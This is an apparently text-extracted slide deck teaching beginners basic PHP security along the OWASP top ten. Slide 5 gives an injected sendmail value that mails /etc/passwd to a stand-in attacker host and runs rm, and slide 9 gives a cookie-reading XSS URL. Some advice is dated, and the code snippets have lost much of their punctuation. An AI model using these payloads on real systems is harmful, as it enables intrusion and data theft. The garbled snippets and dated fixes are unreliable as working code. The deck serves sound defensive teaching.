ABC of Securing PHP code

1
ABC of Securing PHP code

• Dr. Tarique Sani
• C.T.O. SANIsoft
• Nagpur, India

2
Why, Who, What is this talk about?

• PHP very popular, Easily learned Weekend
• Designers usually not aware of security
• New and Intermediate PHP programmers and PHP
  trolls
• Outline the most common security issues seen in
  web applications
• Simple solutions for each of them in PHP

3
What this talk is not...

• This is not a comprehensive guide
• This is not a talk on cracking security flaw
• Will not talk about specific software flaws
• This is not about PHP installation or server
  configuration

4
OWASP - Top Ten

• Unvalidated Parameters
• Broken Access Control
• Broken Account and Session Management
• XSS Flaws
• Buffer Overflows

• Command Injection
• Error Handling Problems
• Insecure use of cryptography
• Remote Admin Flaws
• Server Misconfiguration

.http//www.owasp.org
5
Unvalidated Parameters

• What are they and why are they harmful
• function Send(sendmail "/usr/sbin/sendmail")
• if (this-gtform "")
• fp popen (sendmail."-i".this-gtto, "w")
• else
• fp popen (sendmail."-i -f".
• this-gtfrom." ".this-gtto, "w")
• dummy_at_dummy.com badguy_at_evil_host.com lt
  /etc/passwd rm

6
Unvalidated Parameters 2

• Don't turn register_globals on! (off by default
  since 4.2.0)
• Never trust user input always validate, often
  using regular expressions is enough.
• (a-Z ) Matches all chars from a-Z and
  
• Ready made regular expressions -
  .http//regexlib.com
• Use Form Libraries to ease up form validation
  cycle
• PEAR HTML_Quickforms
• OOH Forms

7
Broken Access Control

• Problem - poorly written, poorly understood
  authentication libraries
• Solution - use accepted and tried libs like
• PEAR Auth and Auth_HTTP
• PHPlib Auth
• Add security by using md5 hash of secret salt and
  data
• secretWord 'boogarel'
• userId sde123d4
• hash md5(secretWord.userId)
• setcookie('id',userId.'-'.hash)

8
Broken Account Sessions

• PHP's built-in session management.
• Store the sessions in a database or in a part of
  the file system that only trusted users can
  access. Not a globally readable /tmp
• Use SSL connection when needed

9
XSS Flaws

• What it is?
• Inserting / gathering malicious data most often
  by using a specially crafted URL
• .http//www.phpnuke.org/user.php?opuserinfouname
  ltscriptgtalert(document.cookie)lt/scriptgt
• Solution!
• .htmlspecialchars(), strip_tags(), utf8_decode()
• .http//www.cgisecurity.com/articles/xss-faq.txt
  

10
Command Injection

• What is it?
• exec(), system(), passthru(), backtick operator
• Solutions
• escapeshellcmd()
• escapeshellarg()
• realpath()
• addslashes()

11
Error Handling problems

• Error output can display sensitive info
• Eg Warning access denied for user
  tarique_at_localhost (using password NO)
• Solution
• die statements
• log_errors On
• display_errors Off

12
Insecure use of Cryptography

• Not directly PHP scripting related
• Use mcrypt functions
• Store the keys and salt securely

13
Remote Administration Flaws

• Not directly PHP scripting related
• SSL connection to prevent sniffing of passwords
  and content
• Change default passwords of third party tools
• Remove install files
• Admin tools on a different server than the public
  server

14
Web and Application Server config

• Not directly PHP scripting related
• safe_mode
• safe_mode commands

15
Conclusion

• This is just scratch on tip of the iceberg
• Ensuring security in PHP is simple and very
  effective
• Keeping abreast with PHP development
  paysDiscuss more at in-phpug_at_yahoogroups.com